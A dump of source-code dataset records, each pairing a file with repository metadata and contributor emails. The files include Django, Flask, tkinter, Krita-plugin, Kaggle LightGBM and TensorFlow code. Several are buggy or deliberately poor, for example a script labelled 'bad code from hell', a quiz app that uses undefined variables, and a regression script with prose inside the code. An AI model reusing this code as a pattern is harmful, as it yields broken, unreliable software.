name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('author', models.CharField(max_length=255)),
('category', models.CharField(max_length=100)),
],
),
]
| [
"justin.r.dietz@gmail.com"
] | justin.r.dietz@gmail.com |
92d3cc7dded89829e257acc53e820d4f8b3db58b | f8751f1301ac482f8dec55616cdc3f8f7507092d | /hihi/app_li/urls.py | fee99a9d44e99dfa47783a5ac983b71a3fd78de9 | [] | no_license | dragon-final-project/django-prac | 561ae97c2a8df388246039ee78e2f50e9a3b5963 | 8dcc37d61deefb9c668594cde34284308d89c34e | refs/heads/master | 2020-03-22T17:40:04.076909 | 2018-07-22T12:33:54 | 2018-07-22T12:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from django.urls import path
from .views import secreat
urlpatterns = [
path('', secreat),
]
# URL/app/show/
| [
"apple@appledeMacBook-Air-2.local"
] | apple@appledeMacBook-Air-2.local |
f96585bae9d1f54ec1af98180b5f27849eba8e8e | c1eb1506ca2a3ab61795d0f9a5f399e7ac0b67fa | /Solve_For_X.py | a710c2163b8e16acf90e8e25ae282f95f671a139 | [] | no_license | studiou/Human-Factors---Proximity---Data-collection | e145c52a5995839bfc2fff2e525f27a82b5bee55 | 8b8a37eeba9c2f00efd49e4093de85cdd15ad6a2 | refs/heads/master | 2021-09-14T04:26:04.627412 | 2018-01-23T19:59:57 | 2018-01-23T19:59:57 | 114,662,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | __author__ = 'joel'
import math
def solveforx(y, angle):
if angle > 0:
#x=y*tan(angle)
x = y*(math.tan(math.radians(angle)))
else:
x = 0
return (x) | [
"studiou.ge@gmail.com"
] | studiou.ge@gmail.com |
7045d25d019bca79616a47e6d947e80e72753e89 | 9a7c156365d5c80b989b93c4201958936876e245 | /Scientia/server.py | ba91de564bb84af4b25f246b1e529b3f087d35de | [] | no_license | vijay4004/Scientia | adc4189a72a2e766a3b7ca0129141222df1a5c84 | 3e4b519cdc8388349283d86325837c17e2c719fd | refs/heads/master | 2022-09-26T00:30:40.105045 | 2020-06-04T09:07:08 | 2020-06-04T09:07:08 | 269,308,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,405 | py | from flask import Flask, render_template, request, jsonify
from flask_restful import Resource, Api
from flask_mysqldb import MySQL
app = Flask(__name__)
api = Api(app)
# app.config['MYSQL_HOST'] = 'localhost'
# app.config['MYSQL_DATABASE_PORT'] = '3306'
# app.config['MYSQL_USER'] = 'root'
# app.config['MYSQL_PASSWORD'] = 'vijay4004'
# app.config['MYSQL_DB'] = 'employees'
# mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == "POST":
details = request.form
name = details['name']
designation = details['designation']
address = details['address']
phone = details['phone']
print(name)
cur = mysql.connection.cursor()
cur.execute("INSERT INTO empdetails(name, designation, address, phone) VALUES (%s, %s, %s, %s)", (name, designation, address, phone))
mysql.connection.commit()
cur.close()
return 'success'
return render_template('home.html')
class Employee(Resource):
def get(self):
return {"employees":[1,2,3,4]}
def post(self):
details = json.loads(request.form.get('payload'))
name = details['name']
designation = details['designation']
address = details['address']
phone = details['phone']
print(details)
api.add_resource(Employee, '/')
if __name__ == '__main__':
app.run(port='5002') | [
"vijayyadaviitism@gmail.com"
] | vijayyadaviitism@gmail.com |
683c8168877dd2b6b8a0c8527e1f7de813a4bdfd | 4c6e0771833c087876b91962ca0f7c2ef821daa4 | /numscrypt/random.py | 1eecb29cb5e905085a0f3250913c2166291b3135 | [
"Apache-2.0"
] | permissive | fangbei/Numscrypt | fb8a57d57ee1fad39ed9789f4e6241ae152ca563 | cf92b8b8edc57b08d24e8db482b5ea9ee8f494cd | refs/heads/master | 2021-01-17T05:18:43.257510 | 2016-03-30T10:27:13 | 2016-03-30T10:27:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | import numscrypt as ns
def rand (*dims):
result = ns.empty (dims, 'float64')
for i in range (result.data.length):
result.data [i] = Math.random ()
return result
| [
"info@qquick.org"
] | info@qquick.org |
92aece0e84d6fa231abb8862e3d9d091bd2e62d0 | 390e4715e3a3b4ce81213fd2508ba875b54281a8 | /linear regression.py | a6f66548b48898d94ad12cba877a492baffce1c9 | [] | no_license | km-mnk/machine-learning | 276685e7e10588b4e5cc367dc2447b29c05de5d0 | 9bff2fafacf71145a32f355af8012af58a28c906 | refs/heads/master | 2020-04-22T11:00:13.607535 | 2019-07-08T10:36:53 | 2019-07-08T10:36:53 | 170,324,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | import pandas as pd
from sklearn.linear_model import LinearRegression
data=pd.read_csv('/home/cbit/Desktop/gpa.csv')
print(data.head())
X=data.iloc[:,:-1]
y=data.iloc[:,1]
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2, random_state=0)
model = LinearRegression()
model.fit(X_train, y_train)
yy=model.predict(X_test)
print(yy)
#accuracy
error=0
ss=list(y_test)
j=0
for i in yy:
error=error+abs(i-ss[j])
j=j+1
print(error)
=================================================================================================================================================
calculating error:
Mean Absolute Error
Mean Square Error
Mean Absolute Percentage Error
Mean Percentage Error
Mean Absolute
| [
"noreply@github.com"
] | noreply@github.com |
6d60724b38aff1eb7a74f5a40651d5aacb957795 | 76f987c964b64a4a5ab5b32e0b120d716ac51d50 | /examcopy.py | 3566062215f05741a596f13ddc349dec7bb4c856 | [] | no_license | Anurag-Srivastav/python-gui-test-application | 550bd98adc54210773b52bb497742cfc57aeef4b | 613438956e6488b66de9b89958613c15042a25e0 | refs/heads/master | 2022-04-14T07:50:30.992233 | 2020-04-08T21:09:43 | 2020-04-08T21:09:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,811 | py | from tkinter import *
import sqlite3
from tkinter import messagebox
conn=sqlite3.connect("db/questions.db")
c=conn.cursor()
##################VARIABLES########################
i=1
m=0
r=0
un=0
f=0
################################FUNCTIONS#####################################
def new():
box=0
q2=["Integer","String","Float","Double"] #2
q3=["z=z++","z=z+-","z=z+1","z=z**"] #1
q4=["[1j,4,5]","[5,4,1j]","Type Error","[4,5,1j]"] #3
q5=["Function","Cursor","Module","Class"] #4
q6=["insert","append","Only 1","Both 1 and 2"] #1
q7=["List","Tuple","Dictionary","Set"] #2
q8=["12","16","64","18"] #2
q9=["Canvas","Turtle","Tkinter","Graphics"] #2
q10=["1","-2","2","-1"] #4
global i
i=i+1
l.configure(text="Question Number "+str(i))
b=c.execute("select quest from easyques where qid=" + str(i)).fetchall()
p=str(b)
ques.configure(text=p[2:(len(p) - 2):1])
if(i==2):
displayoptions(q2)
if(i==3):
displayoptions(q3)
if(i==4):
displayoptions(q4)
if(i==5):
displayoptions(q5)
if(i==6):
displayoptions(q6)
if(i==7):
displayoptions(q7)
if(i==8):
displayoptions(q8)
if(i==9):
displayoptions(q9)
if(i==10):
displayoptions(q10)
if(i==11):
w.destroy()
import endpage
for box in range(0,15):
ent=Label(ef, text="YOUR RESPONSE :",font=("Times New Roman",22,'bold'),bg="grey")
ent.place(relx=0.05, rely=0.8)
res=Entry(ef,bg="skyblue",font=("Times New Roman",20,'bold'),width=4,bd=5)
res.place(relx=0.32, rely=0.8)
u=res.get()
check(u)
def check(u):
global i
global m
global r
global un
global f
if(i==1 and u=='2'):
m=m+1
r=r+1
elif i not in ['1','2','3','4']:
un=un+1
else:
m=c-0.25
f=f+1
print(m,r,un,f)
def endpage():
w.destroy()
import endpage
def displayoptions(option):
pp=0.35
for k in range(0,len(option)):
B=Label(text=option[k], bg="black",fg="white",font=("Times New Roman",22,'bold'),bd=5,width=12)
B.place(relx=0.3,rely=pp)
pp=pp+0.07
b=Button(ef,text="Next",bg="black",fg="white",font=("Times New Roman",20,"bold"),width=10,bd=3,
activebackground="grey",activeforeground="black",highlightcolor="grey",command=new)
b.place(relx=0.75, rely=0.8)
B.forget()
def calc(n):
global i
if(i==2 and n==2):
c=c+1;
print(c)
##################################window#################################################
w=Tk()
w.attributes("-fullscreen",True)
w.configure(bg="black")
#examframe
ef=Frame(bg="grey",height=w.winfo_screenheight()/1.8,width=w.winfo_screenwidth()/1.5)
ef.place(relx=0.23,rely=0.2)
a=str(c.execute("select quest from easyques where qid=1").fetchall())
ques=Label(ef,text=a[2:(len(a)-2):1],bg="grey",font=("Times New Roman",25,"bold"))
ques.place(relx=0.09,rely=0.1)
#numbering
bp=0.269
for y in range(1,5):
hi=Label(ef,text=(str(y)+")"),bg="black",fg="white",font=("Times New Roman",22,'bold'),bd=5,width=4)
hi.place(relx=0.05,rely=bp)
bp=bp+0.126
#options
q1=["James Gouslin","Guido Rossum","Dennis Retchie","Bane Strostrup"]
displayoptions(q1)
#sideframe
sf=Frame(bg="grey",height=w.winfo_screenheight()/1.8,width=w.winfo_screenwidth()/5)
sf.place(relx=0.01,rely=0.2)
#topframe
tf=Frame(bg="grey",height=w.winfo_screenheight()/9,width=w.winfo_screenwidth()/2)
tf.place(relx=0.23,rely=0.04)
l=Label(text="Question Number 1",bg="grey",font=("Arial Black",40))
l.place(relx=0.27,rely=0.05)
#canvas
z=Canvas(w,height=w.winfo_screenheight()/6,width=w.winfo_screenwidth()/10)
z.place(relx=0.0999,rely=0.01)
img=PhotoImage(file="new11.gif")
z.create_image(2,2 ,anchor=NW , image=img)
#taskbar
tb1=Frame(bg="grey",height=w.winfo_screenheight()/12,width=w.winfo_screenwidth()/1)
tb1.place(relx=0.0,rely=0.85)
end=Button(tb1,text="END",background="black",foreground="white",activebackground="black",font=("Times New Roman",20,'bold'),width=10,command=endpage)
end.place(relx=0.8,rely=0.1)
#response
#o=res.get()
#submit
ent=Label(ef, text="YOUR RESPONSE :",font=("Times New Roman", 22, 'bold'),bg="grey")
ent.place(relx=0.05, rely=0.8)
res=Entry(ef, bg="skyblue", font=("Times New Roman", 20, 'bold'), width=4, bd=5)
res.place(relx=0.32, rely=0.8)
u=res.get()
print(u)
S=Button(ef, text="SUBMIT", bg="black", fg="white", font=("Times New Roman", 20, "bold"), width=10, bd=3,activebackground="grey", activeforeground="black", highlightcolor="grey",command=new)
S.place(relx=0.56,rely=0.8)
w.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
92fa8e75603a7fc0820ed907b0d952195f975939 | aeca07bdf3b6a335820c61348547a616a5962d16 | /store/migrations/0002_auto_20200807_1918.py | e60ac5b6b9ffcf48795780bc0adcfbf79383919e | [] | no_license | dhruv-shindhe/Fipple_V1 | 43b4308f759a838a31a1816bd8d93f0a3ab5b5e9 | 020f2f15f6526661c6b1853771a2bb0d1bbef8c6 | refs/heads/master | 2023-02-06T12:34:31.554238 | 2020-12-20T18:21:51 | 2020-12-20T18:21:51 | 323,093,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # Generated by Django 3.1 on 2020-08-07 13:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='store',
name='image',
field=models.ImageField(default='store/default_product.jpg', upload_to='store'),
),
]
| [
"dhruv.shindhe@gmail.com"
] | dhruv.shindhe@gmail.com |
f1acab3516a1d6e70fe5b6edf8b426d164c1607f | 4fc987d114245483e5bfffcec9f3202f673aac09 | /Programs/split.py | c6637b2f743ccce095db052059f5d2fa3c5053dc | [] | no_license | pvenkatesh786/Python | d041f730f78804edd1e6d87ab530bd915ea132dd | 563400a7a712f4481365a9d67e9bb38e47e88f37 | refs/heads/master | 2020-04-12T03:08:23.715916 | 2017-03-17T05:56:46 | 2017-03-17T05:56:46 | 60,979,728 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | #!/bin/python
str = raw_input("Please Enter :")
lst = str.split(',')
print lst
tpl = tuple(lst)
print tpl
| [
"padalavenkatesh786@gmail.com"
] | padalavenkatesh786@gmail.com |
05d1080f0efc343e6871e2ecd7d7aa499ab9b77b | 1b8118cf2744df4ee6f424123c95ec52d4329ff0 | /KritaToSpine/KritaToSpine.py | 8a01309873a46347353e36ea060d64baf5d5f032 | [] | no_license | DanMcLaughlin/krita-unofficial-spine-export | 149e5df9e80c14af819c49be4806c6c6e4dda285 | fe8c86fe0abe309f745bb370133f35439dfc0d59 | refs/heads/master | 2020-04-27T18:01:44.398096 | 2019-05-27T15:21:40 | 2019-05-27T15:21:40 | 174,550,590 | 15 | 5 | null | 2019-03-08T14:20:20 | 2019-03-08T14:20:20 | null | UTF-8 | Python | false | false | 1,260 | py | # Spine export
# Forked from Unofficial Spine Export (https://github.com/chartinger/krita-unofficial-spine-export)
# Based on the Esoteric Software Photoshop plugin, and the Spine Document Tools plugin
# uidocumentools.py contains the main window and logic, including tabs for applying effects on export
# SpineExport.py contains the code and support for doing the exporting
from krita import (Krita, Extension)
from . import uidocumenttools
class SpineExport(Extension):
def __init__(self, parent):
super().__init__(parent)
def setup(self):
pass
def createActions(self, window):
action = window.createAction("spineexportAction",i18n("Spine Export"))
action.setToolTip(i18n("Plugin to export to Spine."))
action.triggered.connect(self.initialize)
#action = window.createAction("spineexportAction", "Export to Spine", "tools/scripts")
#action.triggered.connect(self.exportDocument)
def initialize(self):
self.uidocumenttools = uidocumenttools.UIDocumentTools()
self.uidocumenttools.initialize()
# And add the extension to Krita's list of extensions:
Krita.instance().addExtension(SpineExport(Krita.instance()))
# End of file
| [
"dan.mclaughlin@gmail.com"
] | dan.mclaughlin@gmail.com |
d9053e4b81214feef41611784d616315dac60341 | d7f4e730935cedfc3b744a5806178388d8c9acde | /bad_code_from_hell/main.py | 3847eaf0f0029c8e83094ac2457befe563dcf08e | [] | no_license | SaraMederos/pystarters | 18eeddbb0a6ea26ac48c6ad1f346c5207a99c46a | fe29858b25d21d8ba8be5d82e198a5839a49494f | refs/heads/master | 2023-03-18T03:31:31.652607 | 2018-11-13T20:57:22 | 2018-11-13T20:57:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,670 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from skimage.exposure import rescale_intensity
def mk_background(vname, n=1000, from_frame=0):
'''
Creates a backround image from the average of 'n' frames
from video 'vname'.
Returns an array of the same size as each frame in vname.
'''
my_vid = cv2.VideoCapture(vname)
my_vid.set(cv.CV_CAP_PROP_POS_FRAMES, from_frame)
my_y, my_x = (int(my_vid.get(cv.CV_CAP_PROP_FRAME_HEIGHT)), int(my_vid.get(cv.CV_CAP_PROP_FRAME_WIDTH)))
buf = np.empty( (my_y, my_x, n), dtype=np.uint8 )
for i in range(n):
ret_val, img = my_vid.read()
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
buf[:,:,i]=img
my_vid.release()
return buf.mean(2).astype(np.uint8)
def playVid(video, vidName):
"""
Play the video
"""
cv.NamedWindow(vidName, 1)
while True:
ret_val, frame = video.read()
if ret_val is False: break
cv2.imshow(vidName, frame)
if (cv2.waitKey(30) != -1):
cv.DestroyWindow(vidName)
break
def getMindur(duration):
'''
Returns total duration in string format min:sec
'''
return '{:02}:{:02}'.format(int(duration // 60.), int(duration % 60.))
## === Set variables === ##
videoFile = './videos/teleporter.h264' # The file to load
background = "00:11"
start = '00:27' # When we track from
end = "1:53" # When we track to
dataFile = 'data.tab' # File name for ouput
writeToFile = True # False | True
## === End set variables === ##
## Begin.
# Threshold to create binary image. For red videos ~15 seems to
# work fine; for brighter ones set it to ~50.
#threshold = 15
MHI_DURATION = 0.1 # I don't remember 0.1 what
import os, sys, time
import cv2
from cv2 import cv
import numpy as np
from matplotlib import pyplot as plt
from skimage.segmentation import clear_border
if videoFile[len(videoFile) - 5: len(videoFile)] == '.txt':
print "We dont' work with txt files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.doc':
print "We dont' work with doc files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.pdf':
print "We dont' work with doc files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.jpg':
print "We dont' work with jpg files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.tif': # TODO make work for tiff
print "We dont' work with jpg files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.png': # TODO: add eps, ai, ps, csv
print "We dont' work with png files"
sys.exit()
video = cv2.VideoCapture(videoFile)
print "Program starting with video" + videoFile
## Define functions.
def timeStrToFrame(timeStr, f):
'''
timeStr Time string in format mm:ss.
fps Frames per second
Returns the frame number that corresponds to that time.
'''
timeStr = [timeStr[0:timeStr.find(':')], timeStr[timeStr.find(':') + 1:]]
if len(timeStr) == 2:
s = int(timeStr[1]) + (int(timeStr[0]) * 60) # The number of seconds
else:
raise NotImplementedError
return s * f # The frame
get_time = lambda: time.strftime('%Y.%m.%d %H:%M:%S')
## Initialise variables and arrays.
start = timeStrToFrame(start, int(video.get(cv.CV_CAP_PROP_FPS))); end = timeStrToFrame(end, int(video.get(cv.CV_CAP_PROP_FPS))); bgFrameNumber = timeStrToFrame(background, int(video.get(cv.CV_CAP_PROP_FPS)))
print "Tracking from "+str(start) + "to" + str(end) + ". Background is at ".format(background)
print "Number of background frames"+str(bgFrameNumber)
currentFrame = int(video.get(cv.CV_CAP_PROP_POS_FRAMES))
vidSize = (int(video.get(cv.CV_CAP_PROP_FRAME_HEIGHT)), int(video.get(cv.CV_CAP_PROP_FRAME_WIDTH)))
mhi = np.empty(vidSize, np.float32)
if writeToFile:
fout = open(dataFile, 'w')
fout.writelines('{}\t{}\t{}\n'.format(\
*['frameNum', 'centreX', 'centreY']))
## Read frames from video and detect motion.
# There seems to be a bug in opencv that prevents seeking for a
# specific frame in the video. Thus, we have to load each frame
# from the beginning and ignore the frames that are not needed.
while (currentFrame < end) == 1:
# Read frame.
ret, image = video.read()
# Quit if no frame was read or the user cancels operation.
if ((ret == 0) or (cv2.waitKey(1) != -1)):
video.release()
if writeToFile: fout.close()
break
currentFrame = int(video.get(cv.CV_CAP_PROP_POS_FRAMES))
# Upon reading the designated background frame, convert to gray
# display for reference.
if (currentFrame == bgFrameNumber):
bg = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
plt.imshow(bg, plt.cm.Greys_r)
plt.title("Background")
plt.axis('off')
plt.show(block=False)
# Ignore tracking if the current frame is not within the
# required range.
if (currentFrame < start):
continue
# Convert image to gray. Keep a colour copy for displaying.
ctr = image.copy()
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Subtract background from image.
imgsub = cv2.absdiff(image, bg)
# Threshold image.
ret, silh = cv2.threshold(imgsub, 15, \
255, cv2.THRESH_BINARY)
# Update motion history.
clear_border(silh)
cv2.updateMotionHistory(silh, mhi, time.clock(), MHI_DURATION)
# Find contours.
mhi_int = mhi.astype(np.uint8)
contours, hierarchy = cv2.findContours(mhi_int,\
mode=cv2.RETR_LIST,
method=cv2.CHAIN_APPROX_NONE)
if (len(contours) > 0):
cnt = contours[np.argmax([cv2.contourArea(c) for c in contours])] # Find index of largest contour, which should be the mouse.
# Fit an ellipse around the contour.
cv2.drawContours(ctr, [cnt], 0, (255, 255, 255), 2)
m = cv2.moments(cnt.astype(np.float32))
try:
c = [(m['m10'] / m['m00']), (m['m01'] / m['m00'])] # Πονάει όταν πρέπει να μεταφράσεις σχόλια.
except:
c = [-1, -1]
# Draw the ellipse in green on the frame for displaying
# progress.
# cv2.ellipse(ctr, ellipse, color=(0, 255, 0))
#cv2.drawContours(img_colour, cnt, -1, (0,255,0))
# Save ellipse params to text file.
if writeToFile:
fout.write('{}\t'.format(currentFrame))
fout.write('{}\t{}\t'.format(*c))
# Display progress.
cv2.imshow(videoFile[videoFile.rfind('/')+1:len(videoFile)-5], ctr)
| [
"c.rousseau@ucl.ac.uk"
] | c.rousseau@ucl.ac.uk |
a7176baef4d77bbf660c398d339c90296cd2f6b7 | f78713bf8922720e1100d3cf28731ed57d23489f | /Question_25.py | a612ca1b593787be481686213042df1413c8c6b2 | [] | no_license | Pranay2309/Test6_Corrections | 672b4c2a56550440e247eb4bfa1f8ebe61ed3d72 | 8915d53710080701a6ae9c146857c750a9af9c63 | refs/heads/master | 2022-12-09T04:40:27.432380 | 2020-09-16T06:36:13 | 2020-09-16T06:36:13 | 295,944,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | print('abcd'.translate({97:98,98:99,99:100}))
| [
"pranayyesekar2309@gmail.com"
] | pranayyesekar2309@gmail.com |
9346e299b29cdb9fc9e6cd49bfae383ada7dd18e | 957ab2916bb75edc78b9d7598b4f890b80687ea8 | /core_library/game/file_processing.py | 54792eabf69578013dbe142f86df137299ab7598 | [] | no_license | doug3230/Slayer | 9e91f5db01702c206c3d52460bfb880691d3eb6a | 1dd7e72779e060c397f1e68b829004e147e15f84 | refs/heads/master | 2016-09-06T03:32:53.914322 | 2014-11-01T07:27:12 | 2014-11-01T07:27:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,956 | py | '''
Created on Oct 25, 2014
@author: Richard
'''
import pygame, customization
from pygame.freetype import Font, SysFont
def path_to_file(dir_name, file_name):
if dir_name:
return "{0}/{1}".format(dir_name, file_name)
else:
return file_name
def path_to_image(file_name):
return path_to_file(customization.file_settings.FILE_IMAGE_DIRECTORY, file_name)
def path_to_music(file_name):
return path_to_file(customization.file_settings.FILE_MUSIC_DIRECTORY, file_name)
def path_to_level(file_name):
return path_to_file(customization.file_settings.FILE_LEVEL_DIRECTORY, file_name)
def path_to_font(file_name):
return path_to_file(customization.file_settings.FILE_FONT_DIRECTORY, file_name)
def load_music(file_name, path_included = False):
if not path_included:
pygame.mixer.music.load(path_to_music(file_name))
else:
pygame.mixer.music.load(file_name)
return
def play_music(loop = True):
if loop:
pygame.mixer.music.play(-1)
else:
pygame.mixer.music.play()
return
def stop_music():
pygame.mixer.music.stop()
return
def load_image(file_name, path_included = False):
if not path_included:
image = pygame.image.load(path_to_image(file_name))
else:
image = pygame.image.load(file_name)
return image.convert()
def resize_image(image, new_width, new_height):
image = pygame.transform.scale(image, (int(new_width), int(new_height)))
return image.convert()
def load_font(file_name, size, bold = False, italic = False, path_included = False):
if not path_included:
font = Font(path_to_font(file_name), size, bold, italic)
else:
font = Font(file_name, size, bold, italic)
return font
def load_system_font(file_name, size, bold = False, italic = False):
font = SysFont(file_name, size, bold, italic)
return font
| [
"doug3230@mylaurier.ca"
] | doug3230@mylaurier.ca |
3bf1dfaa5339532ee42b32558cc1c9e8bb8157b2 | 9142f290c2ca89e53ced306804fece05043c3aa0 | /py/trash/bk0/908_predict_1026-1.py | fc46045263cfc0793b058c3a73dbecb9567b93fc | [
"MIT"
] | permissive | norihitoishida/PLAsTiCC-2018 | aea5ecff5c06c46e3097673228054726fb1cc972 | f7f3e86fd3b01145de6f96ebe9a7bdad49439956 | refs/heads/master | 2021-10-09T00:19:27.389096 | 2018-12-19T06:29:55 | 2018-12-19T06:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 26 15:46:49 2018
@author: kazuki.onodera
"""
import numpy as np
import pandas as pd
import os, gc
from glob import glob
from tqdm import tqdm
import sys
sys.path.append(f'/home/{os.environ.get("USER")}/PythonLibrary')
import lgbextension as ex
import lightgbm as lgb
from multiprocessing import cpu_count
import utils
utils.start(__file__)
#==============================================================================
SUBMIT_FILE_PATH = '../output/1026-1.csv.gz'
COMMENT = 'f001~011'
EXE_SUBMIT = True
DROP = ['f001_hostgal_specz']
SEED = np.random.randint(9999)
np.random.seed(SEED)
print('SEED:', SEED)
NFOLD = 5
LOOP = 5
param = {
'objective': 'multiclass',
'num_class': 14,
'metric': 'multi_logloss',
'learning_rate': 0.01,
'max_depth': 6,
'num_leaves': 63,
'max_bin': 255,
'min_child_weight': 10,
'min_data_in_leaf': 150,
'reg_lambda': 0.5, # L2 regularization term on weights.
'reg_alpha': 0.5, # L1 regularization term on weights.
'colsample_bytree': 0.5,
'subsample': 0.5,
# 'nthread': 32,
'nthread': cpu_count(),
'bagging_freq': 1,
'verbose':-1,
}
# =============================================================================
# load
# =============================================================================
files_tr = sorted(glob('../data/train_f*.pkl'))
[print(f) for f in files_tr]
X = pd.concat([
pd.read_pickle(f) for f in tqdm(files_tr, mininterval=60)
], axis=1)
y = utils.load_target().target
X.drop(DROP, axis=1, inplace=True)
target_dict = {}
target_dict_r = {}
for i,e in enumerate(y.sort_values().unique()):
target_dict[e] = i
target_dict_r[i] = e
y = y.replace(target_dict)
if X.columns.duplicated().sum()>0:
raise Exception(f'duplicated!: { X.columns[X.columns.duplicated()] }')
print('no dup :) ')
print(f'X.shape {X.shape}')
gc.collect()
COL = X.columns.tolist()
#CAT = list( set(X.columns)&set(utils_cat.ALL))
#print(f'CAT: {CAT}')
# =============================================================================
# cv
# =============================================================================
dtrain = lgb.Dataset(X, y, #categorical_feature=CAT,
free_raw_data=False)
gc.collect()
model_all = []
nround_mean = 0
wloss_list = []
for i in range(LOOP):
gc.collect()
param['seed'] = np.random.randint(9999)
ret, models = lgb.cv(param, dtrain, 99999, nfold=NFOLD,
feval=utils.lgb_multi_weighted_logloss,
early_stopping_rounds=100, verbose_eval=50,
seed=SEED)
model_all += models
nround_mean += len(ret['multi_logloss-mean'])
wloss_list.append( ret['wloss-mean'][-1] )
nround_mean = int((nround_mean/LOOP) * 1.3)
result = f"CV wloss: {np.mean(wloss_list)} + {np.std(wloss_list)}"
print(result)
imp = ex.getImp(model_all)
imp['split'] /= imp['split'].max()
imp['gain'] /= imp['gain'].max()
imp['total'] = imp['split'] + imp['gain']
imp.sort_values('total', ascending=False, inplace=True)
imp.reset_index(drop=True, inplace=True)
imp.to_csv(f'LOG/imp_{__file__}.csv', index=False)
png = f'LOG/imp_{__file__}.png'
utils.savefig_imp(imp, png, x='total', title=f'{__file__}')
utils.send_line(result, png)
COL = imp[imp.gain>0].feature.tolist()
# =============================================================================
# model
# =============================================================================
dtrain = lgb.Dataset(X[COL], y, #categorical_feature=CAT,
free_raw_data=False)
gc.collect()
np.random.seed(SEED)
model_all = []
for i in range(LOOP):
print('building', i)
gc.collect()
param['seed'] = np.random.randint(9999)
model = lgb.train(param, dtrain, num_boost_round=nround_mean, valid_sets=None,
valid_names=None, fobj=None, feval=None, init_model=None,
feature_name='auto', categorical_feature='auto',
early_stopping_rounds=None, evals_result=None,
verbose_eval=True, learning_rates=None,
keep_training_booster=False, callbacks=None)
model_all.append(model)
del dtrain, X; gc.collect()
# =============================================================================
# test
# =============================================================================
files_te = sorted(glob('../data/test_f*.pkl'))
X_test = pd.concat([
pd.read_pickle(f) for f in tqdm(files_te, mininterval=60)
], axis=1)[COL]
for i,model in enumerate(tqdm(model_all)):
y_pred = model.predict(X_test)
if i==0:
y_pred_all = y_pred
else:
y_pred_all += y_pred
y_pred_all /= len(model_all)
sub = pd.read_csv('../input/sample_submission.csv.zip')
df = pd.DataFrame(y_pred_all, columns=sub.columns[1:-1])
# Compute preds_99 as the proba of class not being any of the others
# preds_99 = 0.1 gives 1.769
preds_99 = np.ones(df.shape[0])
for i in range(df.shape[1]):
preds_99 *= (1 - df.iloc[:, i])
df['class_99'] = preds_99
sub = pd.concat([sub[['object_id']], df], axis=1)
sub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')
sub.iloc[:, 1:].hist(bins=30, figsize=(16, 12))
png = f'LOG/sub_{__file__}.png'
utils.savefig_sub(sub, png)
utils.send_line('DONE!', png)
# =============================================================================
# submission
# =============================================================================
if EXE_SUBMIT:
print('submit')
utils.submit(SUBMIT_FILE_PATH, COMMENT)
#==============================================================================
utils.end(__file__)
utils.stop_instance()
| [
"kazuki.onodera@dena.com"
] | kazuki.onodera@dena.com |
32fdd1f1965526ea32fe436729d26b79174c6fb1 | 6097ddb284046a0fe8fd351e3bc792bec062b751 | /tensorflow/python/keras/saving/saved_model.py | def4f21f1e0f5a88e2f5ce79acaae89b1e128424 | [
"Apache-2.0"
] | permissive | siju-samuel/tensorflow | 5f09a0b263e0d8cb2fc2b0af22ed8093315deb28 | 0ac663d9a78ab2c630173fd7b0cc63fedf1526e2 | refs/heads/master | 2022-10-29T20:54:50.896917 | 2019-09-30T05:05:17 | 2019-09-30T05:05:17 | 129,046,287 | 0 | 0 | Apache-2.0 | 2022-10-04T23:45:00 | 2018-04-11T06:37:07 | C++ | UTF-8 | Python | false | false | 62,507 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions to save/load keras Model to/from SavedModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import json
import os
import weakref
import six
from tensorflow.python.client import session
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import optimizers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.engine import input_spec
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.saving import model_from_json
from tensorflow.python.keras.saving import saving_utils
from tensorflow.python.keras.utils import mode_keys
from tensorflow.python.keras.utils import tf_utils
